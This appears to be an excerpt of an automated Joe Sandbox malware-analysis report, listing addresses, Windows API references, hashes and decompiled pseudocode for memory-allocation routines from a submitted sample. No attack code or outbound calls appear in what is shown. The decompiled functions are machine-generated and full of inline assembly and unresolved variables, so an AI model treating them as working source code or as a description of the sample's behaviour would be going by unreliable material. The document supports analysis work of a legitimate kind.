0x000bbf36
0x000bbf46
0x000bbf46
0x000bbf4c
0x000bbf52
0x000bbf54
0x000bc064
0x000bc064
0x000bc065
0x000bc067
0x000bc068
0x000bc069
0x000bc06a
0x000bc06b
0x000bc06c
0x000bc06d
0x000bc06e
0x000bc06f
0x000bc070
0x000bc073
0x000bc076
0x000bc079
0x000bc07b
0x000bc07e
0x000bc081
0x000bc084
0x000bc08d
0x000bbf5a
0x000bbf5f
0x000bbf64
0x000bbf71
0x000bbf74
0x000bbf76
0x000bbf80
0x000bbf8a
0x000bbf8f
0x000bbf92
0x000bbf94
0x00000000
0x00000000
0x000bbf9c
0x000bbf9f
0x000bbfa6
0x000bbfae
0x000bbfb2
0x000bbfb9
0x000bbfbb
0x000bc052
0x000bc052
0x00000000
0x000bbfc1
0x000bbfc9
0x000bbfcf
0x000bbfd1
0x000bc05e
0x000bc05f
0x00000000
0x000bbfd7
0x000bbfd7
0x000bbfe1
0x000bbfe4
0x000bbfe7
0x000bbfea
0x000bc00e
0x000bc013
0x000bbfec
0x000bbff1
0x00000000
0x00000000
0x00000000
0x000bbff8
0x00000000
0x00000000
0x000bc000
0x00000000
0x00000000
0x000bc007
0x00000000
0x00000000
0x000bbff1
0x000bc020
0x000bc026
0x000bc02c
0x000bc02e
0x000bc04b
0x00000000
0x000bc030
0x000bc036
0x000bc03c
0x00000000
0x000bc03c
0x000bc02e
0x000bbfd1
0x00000000
0x000bbfbb
0x00000000
0x000bbf80
0x000bbf54
0x000bbf26
0x000bbf10
0x000bbf05
0x000bbec2
0x000bbeac
0x00000000
0x00000000
0x00000000
0x000bbe4d
0x00000000
0x00000000
0x000bbe08
0x000bbe10
0x000bbe18
0x000bbe4f
0x000bbe51
0x000bbe1a
0x000bbe1a
0x000bbe20
0x000bbe25
0x000bbe27
0x000bbe28
0x000bbe28
0x000bbe2f
0x00000000
0x000bbe31
0x000bbe31
0x000bbe32
0x00000000
0x000bbe32
0x000bbe2f
0x00000000
0x00000000
0x000bbdee
0x00000000
0x00000000
0x000bbdf5
0x00000000
0x00000000
0x000bbe03
0x00000000
0x00000000
0x000bbde7
0x00000000
0x00000000
0x00000000
0x000bc200
0x000bc158
0x000bc158
0x000bc15f
0x000bc169
0x00000000
0x000bc169
0x000bc152
0x00000000
0x00000000
0x00000000
0x000bc0ed
0x000bc0ed
0x000bc0ef
0x000bc0ef
0x000bc110
0x000bc119
0x000bc119
0x00000000

APIs

VirtualAlloc.KERNEL32(?,-FFE00000,00000000,00000001,000BBE9C,?,?,-FFE00000,?,?,?,000A6157,00000000), ref: 000BC0E3
GetLastError.KERNEL32(?,000A6157,00000000), ref: 000BC0FB
TryAcquireSRWLockExclusive.KERNEL32(00134B90,?,000A6157,00000000), ref: 000BC11F
VirtualFree.KERNEL32(?,00000000,00008000,?,000A6157,00000000), ref: 000BC14A
ReleaseSRWLockExclusive.KERNEL32(00134B90,?,000A6157,00000000), ref: 000BC178
VirtualAlloc.KERNEL32(?,?,00000000,00000001,?,000A6157,00000000), ref: 000BC1B8
GetLastError.KERNEL32(?,000A6157,00000000), ref: 000BC1C8
VirtualAlloc.KERNEL32(00000000,?,00001000,?,?,000A6157,00000000), ref: 000BC260
VirtualFree.KERNEL32(00000040,?,00004000,?,000A6157,00000000), ref: 000BC275

Memory Dump Source

Source File: 00000010.00000002.503627691.0000000000061000.00000020.00000001.01000000.00000004.sdmp, Offset: 00060000, based on PE: true

Associated: 00000010.00000002.503616294.0000000000060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504300546.0000000000106000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504435698.0000000000120000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504454499.0000000000121000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504486763.0000000000122000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504552019.0000000000131000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504572122.000000000013A000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504579268.000000000013B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_60000_fQQPwD.jbxd

Similarity

API ID: Virtual$Alloc$ErrorExclusiveFreeLastLock$AcquireRelease
String ID:
API String ID: 3229969321-0
Opcode ID: 8365e1de6f5eea6e5833858c34933450fd47658301615e499024047e23d95bb6
Instruction ID: 206e5fa28f4dd6147424103e20069e28ce0de6e00b152ab0f252b0d2cbcbd5e8
Opcode Fuzzy Hash: 8365e1de6f5eea6e5833858c34933450fd47658301615e499024047e23d95bb6
Instruction Fuzzy Hash: E2410471A08214DBF7244BA8ED49FEF77ADEB81350F148425E605B7A90CB74EC809BE4

Uniqueness

Uniqueness Score: -1.00%

Function 000BBDA0 Relevance: 6.3, APIs: 5, Instructions: 71
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 64%

			E000BBDA0(void* __ebx, void* __edi, void* __esi, void* __fp0, void* _a4, signed int _a8, void* _a12, intOrPtr _a16) {
				long _v0;
				long _v4;
				void* _v8;
				intOrPtr _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				long _v36;
				void* _t57;
				void* _t80;
				long _t89;
				signed int _t102;
				void* _t112;
				long _t119;
				void* _t130;
				void* _t133;
				void* _t139;

				_t139 = __fp0;
				_t112 = __edi;
				_t80 = __ebx;
				if(VirtualFree(_a4, 0, 0x8000) == 0) {
					asm("int3");
					asm("ud2");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_t130 = _t133;
					_t102 = _a8;
					_t119 = _a4;
					_t57 = _v0;
					if(_t102 > 6) {
						_t89 = 1;
						goto L9;
					} else {
						switch( *((intOrPtr*)(_t102 * 4 +  &M00116498))) {
							case 0:
								L14:
								_t58 = VirtualFree(_t58, _t119, 0x4000);
								__eflags = _t58;
								if(_t58 != 0) {
									goto L16;
								} else {
									_t58 = GetLastError();
									__eflags = _t58;
									if(_t58 != 0) {
										asm("int3");
										asm("ud2");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										_push(_t130);
										_t131 = _t133;
										_push(_t80);
										_push(_t112);
										_push(_t119);
										_t134 = _t133 - 0xc;
										_t113 = _v0;
										_t122 =  ~_t113;
										_t103 = _v4;
										_t81 = _v8;
										__eflags = _t81;
										if(_t81 == 0) {
											_t78 = E000CC500();
											_t103 = _v0;
											_t81 = (_t78 & _t122) + _a8;
											__eflags = _t81;
										}
										_v28 = _t122;
										_t123 = _t113 - 1;
										_t59 = E000BC090(_t81, _t81, _t103, _t113, _t123, _t139, _a12, _a16);
										_t135 = _t134 + 8;
										_t114 = _t59;
										__eflags = _t59;
										if(_t59 == 0) {
											__eflags = _t81;
											_t104 = _v0;
											_t60 = _v28;
											if(_t81 == 0) {
												goto L43;
											} else {
												goto L25;
											}
										} else {
											__eflags = (_t114 & _t123) - _a8;
											if((_t114 & _t123) == _a8) {
												L46:
												return _t114;
											} else {
												_t63 = VirtualFree(_t114, 0, 0x8000);
												__eflags = _t63;
												if(_t63 == 0) {
													L48:
													asm("int3");
													asm("ud2");
													goto L49;
												} else {
													_t104 = _v0;
													asm("lock sub [0x134b84], edx");
													_t60 = _v28;
													L25:
													_v32 = _t123;
													_t125 = _a8;
													_t84 = (_t114 + _t123 & _t60) + _t125;
													_t62 = E000BC090(_t84, _t84, _t104, _t114 + _t123 & _t60, _t125, _t139, _a12, _a16);
													_t135 = _t135 + 8;
													__eflags = _t62;
													if(_t62 == 0) {
														__eflags = _t84;
														_t92 = _v0;
														if(_t84 == 0) {
															L43:
															_t114 = 0;
															goto L46;
														} else {
															goto L30;
														}
													} else {
														_t114 = _t62;
														__eflags = (_t62 & _v32) - _t125;
														if((_t62 & _v32) == _t125) {
															goto L46;
														} else {
															_t63 = VirtualFree(_t114, 0, 0x8000);
															__eflags = _t63;
															if(_t63 == 0) {
																goto L48;
															} else {
																_t92 = _v0;
																asm("lock sub [0x134b84], ecx");
																_t125 = _a8;
																L30:
																_t63 = _a4;
																_t86 = _t92 + _t63 + 0xffff0000;
																__eflags = _t86 - _t92;
																if(_t86 < _t92) {
																	L49:
																	asm("int3");
																	asm("ud2");
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	_push(_t131);
																	_push(_v20);
																	_push(_v24);
																	_push(0);
																	_push(_v28);
																	_push(_v32);
																	_push(_v36);
																	L18();
																	return _t63;
																} else {
																	_v28 = _t63 + 0xffff0000;
																	__eflags = _a12;
																	_v36 = (0 | _a12 != 0x00000000 | 0x00000002) << 0xc;
																	_t114 = 0;
																	asm("o16 nop [cs:eax+eax]");
																	while(1) {
																		_t69 = E000BC090(_t86, 0, _t86, _t114, _t125, _t139, _a12, _a16);
																		_t135 = _t135 + 8;
																		__eflags = _t69;
																		if(_t69 == 0) {
																			goto L46;
																		}
																		_t95 = _t69 & _v32;
																		__eflags = _t95 - _t125;
																		_t107 =  >  ? _a4 : 0;
																		_t128 = _t125 + _t69 - _t95 + ( >  ? _a4 : 0);
																		_t97 = _t128 - _t69;
																		__eflags = _v28 - _t97 | _t97;
																		if((_v28 - _t97 | _t97) == 0) {
																			L45:
																			_t114 = _t69;
																			goto L46;
																		} else {
																			_t63 = VirtualFree(_t69, 0, 0x8000);
																			__eflags = _t63;
																			if(_t63 == 0) {
																				asm("int3");
																				asm("ud2");
																				goto L48;
																			} else {
																				asm("lock sub [0x134b84], ebx");
																				_t98 = _a12 - 1;
																				__eflags = _t98 - 5;
																				_t111 = _v0;
																				if(_t98 > 5) {
																					_t71 = 1;
																					asm("o16 nop [cs:eax+eax]");
																				} else {
																					switch( *((intOrPtr*)(_t98 * 4 +  &M001164B4))) {
																						case 0:
																							goto L41;
																						case 1:
																							_t71 = 4;
																							goto L41;
																						case 2:
																							goto L41;
																						case 3:
																							goto L41;
																					}
																				}
																				L41:
																				_t69 = VirtualAlloc(_t128, _t111, _v36, _t71);
																				__eflags = _t69;
																				if(_t69 != 0) {
																					asm("lock add [0x134b84], ecx");
																					goto L45;
																				} else {
																					 *0x134b80 = GetLastError();
																					_t125 = _a8;
																					continue;
																				}
																			}
																		}
																		goto L51;
																	}
																	goto L46;
																}
															}
														}
													}
												}
											}
										}
									} else {
										goto L16;
									}
								}
								goto L51;
							case 1:
								L9:
								_t58 = VirtualAlloc(_t57, _t119, 0x1000, _t89); // executed
								__eflags = _t58;
								if(_t58 != 0) {
									L16:
									return _t58;
								} else {
									_t58 = GetLastError();
									__eflags = _t58 - 0x5af;
									if(__eflags == 0) {
										_push(_t119);
										_t58 = L000B0DD0(_t102, __eflags, _t139);
									}
									__eflags = _t58;
									if(_t58 == 0) {
										goto L16;
									} else {
										asm("int3");
										asm("ud2");
										goto L14;
									}
								}
								goto L51;
							case 2:
								_t89 = 4;
								goto L9;
							case 3:
								__ecx = 0x20;
								goto L9;
							case 4:
								__ecx = 0x40;
								goto L9;
						}
					}
				} else {
					asm("lock sub [0x134b84], eax");
					return _a8;
				}
				L51:
			}

0x000bbda0
0x000bbda0
0x000bbda0
0x000bbdb5
0x000bbdc3
0x000bbdc4
0x000bbdc6
0x000bbdc7
0x000bbdc8
0x000bbdc9
0x000bbdca
0x000bbdcb
0x000bbdcc
0x000bbdcd
0x000bbdce
0x000bbdcf
0x000bbdd1
0x000bbdd4
0x000bbdd7
0x000bbdda
0x000bbde0
0x000bbdfc
0x00000000
0x000bbde2
0x000bbde7
0x00000000
0x000bbe34
0x000bbe3b
0x000bbe41
0x000bbe43
0x00000000
0x000bbe45
0x000bbe45
0x000bbe4b
0x000bbe4d
0x000bbe52
0x000bbe53
0x000bbe55
0x000bbe56
0x000bbe57
0x000bbe58
0x000bbe59
0x000bbe5a
0x000bbe5b
0x000bbe5c
0x000bbe5d
0x000bbe5e
0x000bbe5f
0x000bbe60
0x000bbe61
0x000bbe63
0x000bbe64
0x000bbe65
0x000bbe66
0x000bbe69
0x000bbe6e
0x000bbe70
0x000bbe73
0x000bbe76
0x000bbe78
0x000bbe7a
0x000bbe7f
0x000bbe86
0x000bbe86
0x000bbe86
0x000bbe89
0x000bbe8c
0x000bbe97
0x000bbe9c
0x000bbe9f
0x000bbea1
0x000bbea3
0x000bbed7
0x000bbed9
0x000bbedc
0x000bbedf
0x00000000
0x00000000
0x00000000
0x00000000
0x000bbea5
0x000bbea9
0x000bbeac
0x000bc054
0x000bc05d
0x000bbeb2
0x000bbeba
0x000bbec0
0x000bbec2
0x000bc061
0x000bc061
0x000bc062
0x00000000
0x000bbec8
0x000bbec8
0x000bbecb
0x000bbed2
0x000bbee5
0x000bbee5
0x000bbeee
0x000bbef1
0x000bbefb
0x000bbf00
0x000bbf03
0x000bbf05
0x000bbf3b
0x000bbf3d
0x000bbf40
0x000bc044
0x000bc044
0x00000000
0x00000000
0x00000000
0x00000000
0x000bbf07
0x000bbf07
0x000bbf0e
0x000bbf10
0x00000000
0x000bbf16
0x000bbf1e
0x000bbf24
0x000bbf26
0x00000000
0x000bbf2c
0x000bbf2c
0x000bbf2f
0x000bbf36
0x000bbf46
0x000bbf46
0x000bbf4c
0x000bbf52
0x000bbf54
0x000bc064
0x000bc064
0x000bc065
0x000bc067
0x000bc068
0x000bc069
0x000bc06a
0x000bc06b
0x000bc06c
0x000bc06d
0x000bc06e
0x000bc06f
0x000bc070
0x000bc073
0x000bc076
0x000bc079
0x000bc07b
0x000bc07e
0x000bc081
0x000bc084
0x000bc08d
0x000bbf5a
0x000bbf5f
0x000bbf64
0x000bbf71
0x000bbf74
0x000bbf76
0x000bbf80
0x000bbf8a
0x000bbf8f
0x000bbf92
0x000bbf94
0x00000000
0x00000000
0x000bbf9c
0x000bbf9f
0x000bbfa6
0x000bbfae
0x000bbfb2
0x000bbfb9
0x000bbfbb
0x000bc052
0x000bc052
0x00000000
0x000bbfc1
0x000bbfc9
0x000bbfcf
0x000bbfd1
0x000bc05e
0x000bc05f
0x00000000
0x000bbfd7
0x000bbfd7
0x000bbfe1
0x000bbfe4
0x000bbfe7
0x000bbfea
0x000bc00e
0x000bc013
0x000bbfec
0x000bbff1
0x00000000
0x00000000
0x00000000
0x000bbff8
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x000bbff1
0x000bc020
0x000bc026
0x000bc02c
0x000bc02e
0x000bc04b
0x00000000
0x000bc030
0x000bc036
0x000bc03c
0x00000000
0x000bc03c
0x000bc02e
0x000bbfd1
0x00000000
0x000bbfbb
0x00000000
0x000bbf80
0x000bbf54
0x000bbf26
0x000bbf10
0x000bbf05
0x000bbec2
0x000bbeac
0x00000000
0x00000000
0x00000000
0x000bbe4d
0x00000000
0x00000000
0x000bbe08
0x000bbe10
0x000bbe16
0x000bbe18
0x000bbe4f
0x000bbe51
0x000bbe1a
0x000bbe1a
0x000bbe20
0x000bbe25
0x000bbe27
0x000bbe28
0x000bbe28
0x000bbe2d
0x000bbe2f
0x00000000
0x000bbe31
0x000bbe31
0x000bbe32
0x00000000
0x000bbe32
0x000bbe2f
0x00000000
0x00000000
0x000bbdee
0x00000000
0x00000000
0x000bbdf5
0x00000000
0x00000000
0x000bbe03
0x00000000
0x00000000
0x000bbde7
0x000bbdb7
0x000bbdba
0x000bbdc2
0x000bbdc2
0x00000000

APIs

VirtualFree.KERNEL32(?,00000000,00008000,?,?,000722C9,00000003,-FFE00000,?,?,?,000A6157,00000000), ref: 000BBDAD

Memory Dump Source

Source File: 00000010.00000002.503627691.0000000000061000.00000020.00000001.01000000.00000004.sdmp, Offset: 00060000, based on PE: true

Associated: 00000010.00000002.503616294.0000000000060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504300546.0000000000106000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504435698.0000000000120000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504454499.0000000000121000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504486763.0000000000122000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504552019.0000000000131000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504572122.000000000013A000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504579268.000000000013B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_60000_fQQPwD.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 78c05f1ddeb06d84799fe243d9cb6710af3a5ecbdda6bd3ef0a553114bf5b457
Instruction ID: 7775d3d9d5a8f81a1c81c27d33bb44fcfdbb5980faa4fba2e25735d56304f6a9
Opcode Fuzzy Hash: 78c05f1ddeb06d84799fe243d9cb6710af3a5ecbdda6bd3ef0a553114bf5b457
Instruction Fuzzy Hash: 0B01863034420867EB641F75AD49BDB3B9DDF14B91F108420FB15DA9A0EBF0E88085E5

Uniqueness

Uniqueness Score: -1.00%

Function 000B9960 Relevance: 4.7, APIs: 3, Instructions: 234
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 42%

			E000B9960(signed int __ecx, signed short _a4, signed int _a8, intOrPtr _a12) {
				signed char _v0;
				void* _v16;
				void* _v20;
				signed int _v24;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed char _v44;
				signed int _v72;
				signed int _v76;
				char _v89;
				char _v92;
				char _v93;
				char _v96;
				char _v97;
				signed int _v100;
				char _v101;
				signed char _v104;
				signed int _v108;
				signed int _v112;
				signed short _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				char _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t757;
				signed int _t759;
				signed int _t764;
				signed int _t765;
				signed int _t768;
				signed int _t770;
				signed char _t772;
				signed char _t773;
				signed int* _t774;
				intOrPtr _t782;
				void* _t789;
				signed int _t791;
				void* _t792;
				char* _t795;
				signed int _t798;
				signed int _t805;
				signed int _t806;
				intOrPtr _t809;
				signed int _t811;
				signed int _t813;
				signed char _t815;
				signed char _t816;
				signed int* _t817;
				intOrPtr _t819;
				signed char _t821;
				signed int _t828;
				void* _t830;
				signed int _t834;
				signed int _t836;
				signed int _t838;
				signed char _t839;
				signed short _t840;
				signed int* _t841;
				intOrPtr _t849;
				signed int _t860;
				signed short _t861;
				signed int _t863;
				signed int _t867;
				signed int _t869;
				signed int _t870;
				signed short _t883;
				signed char _t885;
				signed int _t887;
				void* _t888;
				signed int _t892;
				signed int _t893;
				signed int _t895;
				signed char _t898;
				signed int _t899;
				signed int* _t900;
				intOrPtr _t902;
				signed int _t907;
				char* _t909;
				signed char _t919;
				signed short _t921;
				signed char _t922;
				signed int _t926;
				signed int _t928;
				signed int _t929;
				signed int _t932;
				signed int _t941;
				signed int _t943;
				signed int _t944;
				signed char _t952;
				signed int _t961;
				signed int _t965;
				signed char _t966;
				signed short _t967;
				signed int _t969;
				signed int _t971;
				signed int _t974;
				signed int _t976;
				signed int _t977;
				void* _t987;
				signed int _t990;
				signed char _t992;
				signed int _t993;
				void* _t999;
				signed int _t1001;
				signed int _t1002;
				signed char _t1004;
				signed int _t1010;
				signed int _t1016;
				signed int _t1017;
				signed char _t1018;
				signed int** _t1022;
				signed int _t1024;
				signed int _t1025;
				signed char _t1029;
				signed int _t1038;
				signed int _t1043;
				intOrPtr _t1046;
				unsigned int _t1047;
				signed int _t1058;
				signed int _t1059;
				signed char _t1060;
				signed int _t1064;
				signed char _t1066;
				signed int _t1072;
				signed int _t1078;
				signed int _t1081;
				intOrPtr _t1083;
				unsigned int _t1088;
				signed int _t1096;
				signed int _t1101;
				intOrPtr _t1104;
				unsigned int _t1105;
				signed int _t1116;
				signed int _t1117;
				signed int _t1121;
				signed int _t1131;
				signed int _t1136;
				signed int _t1138;
				signed int _t1144;
				signed char _t1145;
				signed int _t1152;
				signed int _t1155;
				signed int** _t1160;
				signed int _t1162;
				signed int _t1165;
				intOrPtr _t1167;
				signed int _t1179;
				signed int _t1187;
				signed int _t1192;
				signed int _t1196;
				signed int _t1202;
				signed char _t1203;
				signed int _t1209;
				signed int _t1211;
				signed int _t1217;
				signed char _t1218;
				signed int _t1225;
				signed int _t1231;
				signed int _t1240;
				signed int _t1245;
				signed int _t1247;
				signed int _t1253;
				signed char _t1254;
				signed int _t1257;
				signed int _t1261;
				void* _t1269;
				signed int _t1270;
				signed int _t1271;
				signed int _t1273;
				char _t1281;
				char _t1284;
				void* _t1292;
				signed int _t1293;
				signed int _t1295;
				signed int _t1299;
				void* _t1302;
				signed int _t1307;
				signed int _t1308;
				signed int _t1318;
				signed int _t1321;
				void* _t1324;
				signed int _t1330;
				signed int _t1331;
				signed int _t1340;
				signed int _t1341;
				signed int _t1346;
				signed int _t1352;
				signed int _t1353;
				signed int _t1359;
				signed int _t1360;
				signed char _t1364;
				signed int _t1368;
				signed int _t1370;
				signed short _t1371;
				signed int _t1373;
				signed char* _t1376;
				signed int _t1377;
				signed int _t1378;
				signed short _t1379;
				signed char _t1385;
				signed int _t1393;
				signed int _t1395;
				signed char _t1398;
				signed int _t1403;
				signed int* _t1414;
				signed int _t1416;
				signed int _t1420;
				signed int _t1422;
				signed short _t1423;
				char* _t1426;
				signed int _t1428;
				signed int* _t1437;
				signed int* _t1438;
				signed int** _t1440;
				signed int* _t1443;
				signed char _t1452;
				signed int _t1459;
				signed int _t1460;
				signed int _t1461;
				signed int _t1463;
				void* _t1466;
				signed int _t1474;
				void* _t1484;

				_t1463 = (_t1461 & 0xfffffff0) - 0x20;
				_t1358 = __ecx;
				_t757 =  *0x120014; // 0xf049169a
				_v24 = _t757 ^ _t1459;
				_t759 =  *0x123e38; // 0x0
				_t1029 =  *[fs:0x2c];
				_t760 =  *(_t1029 + _t759 * 4);
				_t1420 = 0;
				if( *((intOrPtr*)( *(_t1029 + _t759 * 4) + 0xa0)) == 1) {
					L11:
					E000DE643(_t760, _t990, _v24 ^ _t1459, _t1261, _t1358, _t1420);
					return _t1420;
				} else {
					_t760 =  *(__ecx + 0x13d0);
					if( *(__ecx + 0x13d0) != 0) {
						goto L11;
					} else {
						asm("lock xadd [edi+0x13d0], eax");
						if(1 == 0x7fffffff) {
							L16:
							asm("int3");
							asm("ud2");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							_push(_t1459);
							_t1460 = _t1463;
							_push(_t990);
							_push(_t1358);
							_push(_t1420);
							_t1466 = (_t1463 & 0xfffffff0) - 0x50;
							_t1421 = _v32;
							_t991 = _v36;
							_t1359 = _v40;
							_t764 =  *0x120014; // 0xf049169a
							_t765 = _t764 ^ _t1460;
							_v72 = _t765;
							_t1262 = _v44;
							__eflags = _t1359;
							if(_t1359 == 0) {
								__eflags = _t1262 & 0x00000010;
								if((_t1262 & 0x00000010) != 0) {
									__eflags = _t991;
									if(_t991 == 0) {
										_t1422 = 1;
									} else {
										_t1422 = _t991;
									}
									_t1421 = _t1422 +  *((intOrPtr*)(_t1029 + 0xc));
									__eflags = _t1421 - _t991;
									if(_t1421 < _t991) {
										goto L353;
									} else {
										_t768 =  *(_t1029 + 2) & 0x000000ff;
										__eflags = _t768 - 2;
										_v124 = _t1421;
										_t992 = _t1029;
										if(_t768 == 2) {
											_t1034 = 0x20;
											__eflags = _t1421;
											if(_t1421 != 0) {
												asm("bsr ecx, esi");
												_t1034 = 0x3f;
												__eflags = 0x20;
											}
											_t770 = 0x20 - _t1034;
											_t771 = (_t1421 >> ( *(0x115a40 - _t1034) & 0x000000ff) & 0x00000007) + _t770 * 8;
											__eflags = ( *(0x115a44 + _t770 * 4) & _t1421) - 1;
											asm("sbb eax, 0xffffffff");
											_t289 = _t771 + 0x11580c; // 0x0
											_t1423 =  *((_t1421 >> ( *(0x115a40 - _t1034) & 0x000000ff) & 0x00000007) + _t770 * 8 + _t289) & 0x0000ffff;
										} else {
											__eflags = _t768 - 1;
											if(_t768 != 1) {
												_t1348 = 0x20;
												__eflags = _t1421;
												if(_t1421 != 0) {
													asm("bsr edx, esi");
													_t1348 = 0x3f;
													__eflags = 0x20;
												}
												_t1416 = _t1421;
												_t974 = 0x20 - _t1348;
												_t1245 =  *(0x115a44 + _t974 * 4) & _t1416;
												__eflags = _t1245 - 1;
												asm("sbb eax, 0xffffffff");
												_t976 =  *((_t1421 >> ( *(0x115a40 - _t1348) & 0x000000ff) & 0x00000007) + _t974 * 8 + (_t1421 >> ( *(0x115a40 - _t1348) & 0x000000ff) & 0x00000007) + _t974 * 8 + 0x11580c) & 0x0000ffff;
												_t1416 - 0x41 = _t976 - 0x76;
												_t1423 = (_t1348 & 0xffffff00 | _t976 - 0x00000076 > 0x00000000) & (_t1245 & 0xffffff00 | _t1416 - 0x00000041 >= 0x00000000) & 0x000000ff | _t976;
											} else {
												_t1247 = _t1421 - 0x101;
												_t977 = _t1421;
												__eflags = _t1247 - 0xfefe;
												if(_t1247 <= 0xfefe) {
													__eflags = _v124 == 1;
													if(_v124 == 1) {
														_t1254 = 0x20;
													} else {
														asm("bsr ecx, eax");
														_t1254 = _t1247 ^ 0x0000001f;
													}
													__eflags = 1 - _v124;
													_t977 =  <  ? 1 <<  ~_t1254 : 0xbadbb1 >> 2;
												}
												_t1457 = 0x20;
												__eflags = _t977;
												if(_t977 != 0) {
													asm("bsr esi, eax");
													_t1457 = 0x3f;
													__eflags = 0x20;
												}
												_t1352 = 0x20 - _t1457;
												_t1353 = (_t977 >> ( *(0x115a40 - _t1457) & 0x000000ff) & 0x00000007) + _t1352 * 8;
												__eflags = ( *(0x115a44 + _t1352 * 4) & _t977) - 1;
												asm("sbb edx, 0xffffffff");
												_t1253 =  *(_t1353 + _t1353 + 0x11580c) & 0x0000ffff;
												_t977 - 0x41 = _t1253 - 0x76;
												_t1423 = (_t1353 & 0xffffff00 | _t1253 - 0x00000076 > 0x00000000) & (_t977 & 0xffffff00 | _t977 - 0x00000041 >= 0x00000000) & 0x000000ff | _t1253;
												__eflags = _t1423;
											}
										}
										_v108 = 0;
										_v104 = 0xffffffff;
										_t1262 = _t992;
										_t993 =  *_t992 & 0x000000ff;
										__eflags = _t993 - 2;
										if(_t993 == 2) {
											_t772 =  *0x123d89 & 0x000000ff;
											__eflags = _t772 & 0x00000001;
											if((_t772 & 0x00000001) != 0) {
												L000B7BD0(_t993, _t1484);
											}
										}
										__eflags =  *((char*)(_t1262 + 3));
										_v120 = _t993;
										if( *((char*)(_t1262 + 3)) == 0) {
											_t991 = (_t1423 & 0x0000ffff) << 5;
											_t1421 = _t1262 + _t991 + 0x48;
											_v136 = _t1262;
											_t550 = _t1262 + 0x40; // 0x6c
											_t773 = _t550;
											_v128 = _t773;
											__imp__TryAcquireSRWLockExclusive(_t773);
											__eflags = _t773;
											if(_t773 == 0) {
												L000A8B90(_t773, _v132);
											}
											_t774 =  *_t1421;
											_t1038 =  *_t774;
											_v136 = _t1038;
											__eflags = _t1038;
											if(_t1038 == 0) {
												goto L336;
											} else {
												_t1273 = _v140;
												_v112 = 0;
												_t1425 =  *((intOrPtr*)(_t1273 + 0x48 + _t991 + 0xc));
												_t991 =  *((intOrPtr*)(_t1273 + 0x48 + _t991 + 0xc)) -  *((intOrPtr*)(_t1273 + 0xc));
												_t1262 =  *_v136;
												__eflags = _t1262;
												if(_t1262 == 0) {
													 *_t774 = 0;
													goto L314;
												} else {
													_t1059 = _t1262;
													asm("bswap ecx");
													__eflags = (_t1059 ^ _v136) - 0x1fffff;
													if((_t1059 ^ _v136) > 0x1fffff) {
														goto L344;
													} else {
														__eflags = _t1059 & 0x001fc000;
														if((_t1059 & 0x001fc000) == 0) {
															goto L344;
														} else {
															asm("prefetcht0 [ecx]");
															 *_t774 = _t1059;
															goto L314;
														}
													}
												}
											}
										} else {
											_t961 =  *0x123e38; // 0x0
											_t1414 =  *( *((intOrPtr*)( *[fs:0x2c] + _t961 * 4)) + 0xa0);
											_v128 = _t1423 & 0x0000ffff;
											__eflags = _t1414 - 2;
											if(_t1414 < 2) {
												_push( &_v104);
												_push(_v128);
												_t1421 = _t1262;
												_t965 = E000B9960(_t1262);
												_v140 = _t965;
												goto L220;
											} else {
												_t1414[2] = _t1414[2] + 1;
												asm("adc dword [edi+0xc], 0x0");
												_t1025 = _t1423 & 0x0000ffff;
												__eflags =  *0x122d20 - _t1025;
												if( *0x122d20 < _t1025) {
													_t1452 = _t1262;
													_t1414[0xa] = _t1414[0xa] + 1;
													asm("adc dword [edi+0x2c], 0x0");
													_t1414[6] = _t1414[6] + 1;
													asm("adc dword [edi+0x1c], 0x0");
													goto L291;
												} else {
													_t969 =  *(_t1414 + 0x58 + _t1025 * 8);
													__eflags = _t969;
													if(_t969 == 0) {
														_t1414[8] = _t1414[8] + 1;
														asm("adc dword [edi+0x24], 0x0");
														_t1414[6] = _t1414[6] + 1;
														asm("adc dword [edi+0x1c], 0x0");
														_t1452 = _t1262;
														E000A85A0(_t1414, _t1025);
														_t1262 = _t1452;
														_t969 =  *(_t1414 + 0x58 + _t1025 * 8);
														__eflags = _t969;
